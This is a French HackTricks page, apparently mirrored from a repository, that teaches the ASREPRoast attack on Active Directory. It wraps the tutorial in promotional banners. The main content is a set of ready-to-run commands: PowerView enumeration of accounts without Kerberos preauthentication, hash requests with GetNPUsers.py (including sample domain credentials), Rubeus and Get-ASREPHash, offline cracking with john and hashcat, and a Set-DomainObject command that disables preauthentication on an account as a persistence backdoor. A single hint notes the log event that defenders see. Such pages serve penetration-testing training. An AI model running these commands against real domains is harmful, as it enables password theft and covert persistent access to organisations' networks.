7.4 KiB
ASREPRoast
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFT
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR au repo hacktricks et au repo hacktricks-cloud.
![](/Mirrors/hacktricks/media/commit/5ce1bd5945c8d73306ad1a6725db451313805909/.gitbook/assets/image%20%281%29%20%283%29%20%281%29.png)
Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes !
Perspectives de piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage
Actualités de piratage en temps réel
Restez à jour avec le monde du piratage rapide grâce aux actualités et aux informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
ASREPRoast
L'attaque ASREPRoast recherche les utilisateurs sans l'attribut de pré-authentification Kerberos requis (DONT_REQ_PREAUTH).
Cela signifie que n'importe qui peut envoyer une demande AS_REQ au DC au nom de l'un de ces utilisateurs et recevoir un message AS_REP. Ce dernier type de message contient un morceau de données chiffrées avec la clé utilisateur d'origine, dérivée de son mot de passe. En utilisant ce message, le mot de passe de l'utilisateur peut être craqué hors ligne.
De plus, aucun compte de domaine n'est nécessaire pour effectuer cette attaque, seulement une connexion au DC. Cependant, avec un compte de domaine, une requête LDAP peut être utilisée pour récupérer les utilisateurs sans pré-authentification Kerberos dans le domaine. Sinon, les noms d'utilisateur doivent être devinés.
Énumération des utilisateurs vulnérables (nécessite des informations d'identification de domaine)
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
Demande de message AS_REP
{% code title="Utilisation de Linux" %}
#Try all the usernames in usernames.txt
python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
#Use domain creds to extract targets and target them
python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast
{% code title="Utilisation de Windows" %}
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]
Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
{% endcode %}
{% hint style="warning" %} La méthode AS-REP Roasting avec Rubeus générera un 4768 avec un type de chiffrement de 0x17 et un type de préauthentification de 0. {% endhint %}
Crackage
john --wordlist=passwords_kerb.txt hashes.asreproast
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Persistance
Forcer preauth non requis pour un utilisateur pour lequel vous avez les permissions GenericAll (ou les permissions pour écrire des propriétés) :
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
Références
Plus d'informations sur l'attaque AS-REP Roasting sur ired.team
![](/Mirrors/hacktricks/media/commit/5ce1bd5945c8d73306ad1a6725db451313805909/.gitbook/assets/image%20%281%29%20%283%29%20%281%29.png)
Rejoignez le serveur HackenProof Discord pour communiquer avec des hackers expérimentés et des chasseurs de primes !
Perspectives sur le piratage
Engagez-vous avec du contenu qui explore les sensations et les défis du piratage
Actualités sur le piratage en temps réel
Restez à jour avec le monde du piratage en évolution rapide grâce à des actualités et des informations en temps réel
Dernières annonces
Restez informé des dernières primes de bugs lancées et des mises à jour cruciales de la plateforme
Rejoignez-nous sur Discord et commencez à collaborer avec les meilleurs hackers dès aujourd'hui !
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une entreprise de cybersécurité ? Voulez-vous voir votre entreprise annoncée dans HackTricks ? ou voulez-vous avoir accès à la dernière version de PEASS ou télécharger HackTricks en PDF ? Consultez les PLANS D'ABONNEMENT !
- Découvrez The PEASS Family, notre collection exclusive de NFTs
- Obtenez le swag officiel PEASS & HackTricks
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez moi sur Twitter 🐦@carlospolopm.
- Partagez vos astuces de piratage en soumettant des PRs au repo hacktricks et au repo hacktricks-cloud.